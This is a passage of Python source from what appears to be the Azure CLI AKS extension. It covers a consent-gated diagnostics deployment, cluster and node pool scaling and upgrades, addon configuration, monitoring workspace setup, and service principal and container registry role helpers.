storage_account_id = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Storage', type='storageAccounts',
name=storage_account
)
else:
storage_account_id = storage_account
if is_valid_resource_id(storage_account_id):
try:
parsed_storage_account = parse_resource_id(storage_account_id)
except CloudError as ex:
raise CLIError(ex.message)
else:
raise CLIError("Invalid storage account id %s" % storage_account_id)
storage_account_name = parsed_storage_account['name']
readonly_sas_token = None
if sas_token is None:
storage_client = cf_storage(cmd.cli_ctx, parsed_storage_account['subscription'])
storage_account_keys = storage_client.storage_accounts.list_keys(parsed_storage_account['resource_group'],
storage_account_name)
kwargs = {
'account_name': storage_account_name,
'account_key': storage_account_keys.keys[0].value
}
cloud_storage_client = cloud_storage_account_service_factory(cmd.cli_ctx, kwargs)
sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rwdlacup',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = cloud_storage_client.generate_shared_access_signature(
'b',
'sco',
'rl',
datetime.datetime.utcnow() + datetime.timedelta(days=1))
readonly_sas_token = readonly_sas_token.strip('?')
from knack.prompting import prompt_y_n
print()
print('This will deploy a daemon set to your cluster to collect logs and diagnostic information and '
f'save them to the storage account '
f'{colorama.Style.BRIGHT}{colorama.Fore.GREEN}{storage_account_name}{colorama.Style.RESET_ALL} as '
f'outlined in {format_hyperlink("http://aka.ms/AKSPeriscope")}.')
print()
print('If you share access to that storage account to Azure support, you consent to the terms outlined'
f' in {format_hyperlink("http://aka.ms/DiagConsent")}.')
print()
if not prompt_y_n('Do you confirm?', default="n"):
return
print()
print("Getting credentials for cluster %s " % name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=True, path=temp_kubeconfig_path)
print()
print("Starts collecting diag info for cluster %s " % name)
sas_token = sas_token.strip('?')
deployment_yaml = urlopen(
"https://raw.githubusercontent.com/Azure/aks-periscope/latest/deployment/aks-periscope.yaml").read().decode()
deployment_yaml = deployment_yaml.replace("# <accountName, base64 encoded>",
(base64.b64encode(bytes(storage_account_name, 'ascii'))).decode('ascii'))
deployment_yaml = deployment_yaml.replace("# <saskey, base64 encoded>",
(base64.b64encode(bytes("?" + sas_token, 'ascii'))).decode('ascii'))
yaml_lines = deployment_yaml.splitlines()
for index, line in enumerate(yaml_lines):
if "DIAGNOSTIC_CONTAINERLOGS_LIST" in line and container_logs is not None:
yaml_lines[index] = line + ' ' + container_logs
if "DIAGNOSTIC_KUBEOBJECTS_LIST" in line and kube_objects is not None:
yaml_lines[index] = line + ' ' + kube_objects
if "DIAGNOSTIC_NODELOGS_LIST" in line and node_logs is not None:
yaml_lines[index] = line + ' ' + node_logs
deployment_yaml = '\n'.join(yaml_lines)
fd, temp_yaml_path = tempfile.mkstemp()
temp_yaml_file = os.fdopen(fd, 'w+t')
try:
temp_yaml_file.write(deployment_yaml)
temp_yaml_file.flush()
temp_yaml_file.close()
try:
print()
print("Cleaning up aks-periscope resources if existing")
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"serviceaccount,configmap,daemonset,secret",
"--all", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRoleBinding",
"aks-periscope-role-binding-view", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"ClusterRole",
"aks-periscope-role", "--ignore-not-found"],
stderr=subprocess.STDOUT)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"--all",
"apd", "-n", "aks-periscope", "--ignore-not-found"],
stderr=subprocess.DEVNULL)
subprocess.call(["kubectl", "--kubeconfig", temp_kubeconfig_path, "delete",
"CustomResourceDefinition",
"diagnostics.aks-periscope.azure.github.com", "--ignore-not-found"],
stderr=subprocess.STDOUT)
print()
print("Deploying aks-periscope")
subprocess.check_output(["kubectl", "--kubeconfig", temp_kubeconfig_path, "apply", "-f",
temp_yaml_path, "-n", "aks-periscope"], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
finally:
os.remove(temp_yaml_path)
print()
fqdn = mc.fqdn if mc.fqdn is not None else mc.private_fqdn
normalized_fqdn = fqdn.replace('.', '-')
token_in_storage_account_url = readonly_sas_token if readonly_sas_token is not None else sas_token
log_storage_account_url = f"https://{storage_account_name}.blob.core.windows.net/" \
f"{_trim_fqdn_name_containing_hcp(normalized_fqdn)}?{token_in_storage_account_url}"
print(f'{colorama.Fore.GREEN}Your logs are being uploaded to storage account {format_bright(storage_account_name)}')
print()
print(f'You can download Azure Stroage Explorer here '
f'{format_hyperlink("https://azure.microsoft.com/en-us/features/storage-explorer/")}'
f' to check the logs by adding the storage account using the following URL:')
print(f'{format_hyperlink(log_storage_account_url)}')
print()
if not prompt_y_n('Do you want to see analysis results now?', default="n"):
print(f"You can run 'az aks kanalyze -g {resource_group_name} -n {name}' "
f"anytime to check the analysis results.")
else:
display_diagnostics_report(temp_kubeconfig_path)
def aks_kanalyze(cmd, client, resource_group_name, name):
colorama.init()
client.get(resource_group_name, name)
_, temp_kubeconfig_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=True, path=temp_kubeconfig_path)
display_diagnostics_report(temp_kubeconfig_path)
def aks_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
node_count,
nodepool_name="",
no_wait=False):
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
raise CLIError('There are more than one node pool in the cluster. '
'Please specify nodepool name or use az aks nodepool command to scale node pool')
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
if agent_profile.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
def aks_upgrade(cmd, # pylint: disable=unused-argument, too-many-return-statements
client,
resource_group_name,
name,
kubernetes_version='',
control_plane_only=False,
no_wait=False,
node_image_only=False,
yes=False):
from knack.prompting import prompt_y_n
msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
if not yes and not prompt_y_n(msg, default="n"):
return None
instance = client.get(resource_group_name, name)
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
msg = "This node image upgrade operation will run across every node pool in the cluster" \
"and might take a while, do you wish to continue?"
if not yes and not prompt_y_n(msg, default="n"):
return None
# This only provide convenience for customer at client side so they can run az aks upgrade to upgrade all
# nodepools of a cluster. The SDK only support upgrade single nodepool at a time.
for agent_pool_profile in instance.agent_pool_profiles:
if vmas_cluster:
raise CLIError('This cluster is not using VirtualMachineScaleSets. Node image upgrade only operation '
'can only be applied on VirtualMachineScaleSets cluster.')
agent_pool_client = cf_agent_pools(cmd.cli_ctx)
_upgrade_single_nodepool_image_version(True, agent_pool_client, resource_group_name, name, agent_pool_profile.name)
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name):
return sdk_no_wait(no_wait, client.upgrade_node_image_version, resource_group_name, cluster_name, nodepool_name)
def _handle_addons_args(cmd, # pylint: disable=too-many-statements
addons_str,
subscription_id,
resource_group_name,
addon_profiles=None,
workspace_resource_id=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
disable_sgxquotehelper=False):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles[CONST_HTTP_APPLICATION_ROUTING_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True, config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id})
addons.remove('monitoring')
# error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".')
if 'azure-policy' in addons:
addon_profiles[CONST_AZURE_POLICY_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True)
addons.remove('azure-policy')
if 'gitops' in addons:
addon_profiles['gitops'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('gitops')
if 'ingress-appgw' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
addons.remove('ingress-appgw')
if 'open-service-mesh' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
addon_profiles[CONST_OPEN_SERVICE_MESH_ADDON_NAME] = addon_profile
addons.remove('open-service-mesh')
if 'confcom' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "true"})
if disable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "false"
addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
addons.remove('confcom')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
# mapping for azure public cloud
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureCloudLocationToOmsRegionCodeMap = {
"australiasoutheast": "ASE",
"australiaeast": "EAU",
"australiacentral": "CAU",
"canadacentral": "CCA",
"centralindia": "CIN",
"centralus": "CUS",
"eastasia": "EA",
"eastus": "EUS",
"eastus2": "EUS2",
"eastus2euap": "EAP",
"francecentral": "PAR",
"japaneast": "EJP",
"koreacentral": "SE",
"northeurope": "NEU",
"southcentralus": "SCUS",
"southeastasia": "SEA",
"uksouth": "SUK",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"westeurope": "WEU",
"westus": "WUS",
"westus2": "WUS2"
}
AzureCloudRegionToOmsRegionMap = {
"australiacentral": "australiacentral",
"australiacentral2": "australiacentral",
"australiaeast": "australiaeast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "southcentralus",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "centralus",
"centralindia": "centralindia",
"eastasia": "eastasia",
"eastus": "eastus",
"eastus2": "eastus2",
"francecentral": "francecentral",
"francesouth": "francecentral",
"japaneast": "japaneast",
"japanwest": "japaneast",
"koreacentral": "koreacentral",
"koreasouth": "koreacentral",
"northcentralus": "eastus",
"northeurope": "northeurope",
"southafricanorth": "westeurope",
"southafricawest": "westeurope",
"southcentralus": "southcentralus",
"southeastasia": "southeastasia",
"southindia": "centralindia",
"uksouth": "uksouth",
"ukwest": "uksouth",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westindia": "centralindia",
"westus": "westus",
"westus2": "westus2"
}
# mapping for azure china cloud
# log analytics only support China East2 region
AzureChinaLocationToOmsRegionCodeMap = {
"chinaeast": "EAST2",
"chinaeast2": "EAST2",
"chinanorth": "EAST2",
"chinanorth2": "EAST2"
}
AzureChinaRegionToOmsRegionMap = {
"chinaeast": "chinaeast2",
"chinaeast2": "chinaeast2",
"chinanorth": "chinaeast2",
"chinanorth2": "chinaeast2"
}
# mapping for azure us governmner cloud
AzureFairfaxLocationToOmsRegionCodeMap = {
"usgovvirginia": "USGV"
}
AzureFairfaxRegionToOmsRegionMap = {
"usgovvirginia": "usgovvirginia"
}
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
cloud_name = cmd.cli_ctx.cloud.name
if cloud_name.lower() == 'azurecloud':
workspace_region = AzureCloudRegionToOmsRegionMap.get(rg_location, "eastus")
workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(workspace_region, "EUS")
elif cloud_name.lower() == 'azurechinacloud':
workspace_region = AzureChinaRegionToOmsRegionMap.get(rg_location, "chinaeast2")
workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(workspace_region, "EAST2")
elif cloud_name.lower() == 'azureusgovernment':
workspace_region = AzureFairfaxRegionToOmsRegionMap.get(rg_location, "usgovvirginia")
workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(workspace_region, "USGV")
else:
logger.error("AKS Monitoring addon not supported in cloud : %s", cloud_name)
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name)
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
try:
resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except CloudError as ex:
if ex.status_code != 404:
raise ex
else:
resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region})
default_workspace_params = {
'location': workspace_region,
'properties': {
'sku': {
'name': 'standalone'
}
}
}
async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
default_workspace_params)
ws_resource_id = ''
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
def _ensure_container_insights_for_monitoring(cmd, addon):
if not addon.enabled:
return None
# workaround for this addon key which has been seen lowercased in the wild
for key in list(addon.config):
if key.lower() == CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID.lower() and key != CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID:
addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID] = addon.config.pop(key)
workspace_resource_id = addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID].strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError('Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
try:
resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview')
location = resource.location
except CloudError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
file_name_aks = 'aksServicePrincipal.json'
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(subscription_id, file_name=file_name_aks)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
store_acs_service_principal(subscription_id, client_secret, service_principal, file_name=file_name_aks)
return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
# Just do the get, we don't need the result, it will error out if the group doesn't exist.
rg = groups.get(resource_group_name)
return rg.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError('value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError('node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError('min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
def _create_client_secret():
# Add a special character to satsify AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id, # pylint: disable=unused-argument
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
# Check if the ACR exists by name accross all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError("ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def aks_agentpool_show(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, # pylint: disable=unused-argument,too-many-locals
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
kubernetes_version=None,
node_zones=None,
enable_node_public_ip=False,
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
pod_subnet_id=None,
ppg=None,
max_pods=0,
os_type="Linux",
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
node_taints=None,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float('nan'),
labels=None,
max_surge=None,
mode="User",
aks_custom_headers=None,
kubelet_config=None,
linux_os_config=None,
no_wait=False):
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
upgradeSettings = AgentPoolUpgradeSettings()
taints_array = []
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError('Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type == "Windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
if max_surge:
upgradeSettings.max_surge = max_surge
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
pod_subnet_id=pod_subnet_id,
proximity_placement_group_id=ppg,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=node_zones,
enable_node_public_ip=enable_node_public_ip,
node_taints=taints_array,
scale_set_priority=priority,
upgrade_settings=upgradeSettings,
mode=mode
)
if priority == CONST_SCALE_SET_PRIORITY_SPOT:
agent_pool.scale_set_eviction_policy = eviction_policy
if isnan(spot_max_price):
spot_max_price = -1
agent_pool.spot_max_price = spot_max_price
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool.os_disk_type = node_osdisk_type
if kubelet_config:
agent_pool.kubelet_config = _get_kubelet_config(kubelet_config)
if linux_os_config:
agent_pool.linux_os_config = _get_linux_os_config(linux_os_config)
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool, custom_headers=headers)
def aks_agentpool_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if instance.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
if new_node_count == instance.count:
raise CLIError("The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
kubernetes_version='',
no_wait=False,
node_image_only=False,
max_surge=None):
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version.'
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
return _upgrade_single_nodepool_image_version(no_wait,
client,
resource_group_name,
cluster_name,
nodepool_name)
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_get_upgrade_profile(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
return client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_update(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
max_surge=None,
mode=None,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
if (update_autoscaler != 1 and not tags and not mode and not max_surge):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode" or "--max-surge"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError('value of min-count should be less than or equal to value of max-count.')
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
